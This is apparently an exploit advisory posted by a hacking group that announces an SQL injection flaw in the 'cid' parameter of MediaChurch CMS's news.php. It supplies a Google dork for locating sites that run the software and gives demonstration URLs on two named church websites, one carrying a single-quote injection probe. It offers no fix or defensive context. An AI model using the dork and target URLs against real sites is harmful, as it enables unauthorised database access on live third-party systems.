############################################################################ # Exploit Title: mediachurch CMS sql injection # Google Dork: " Powered by MediaChurch & Calvary Episcopal Church" # Date: 9/7/2012 # Author: Ajax Security Team # Discovered By: Crim3R # Home: WwW.AjaxTm.CoM # Vendor Software: http://mediachurch.com/ # Version: All Version # Category:: webapps # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ ================================== [+] cid parametr in news.php is Vulnerable to sqli D3m0: http://calvarye.org/news.php?cid=58 http://www.saintge.org/news.php?cid=154' ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369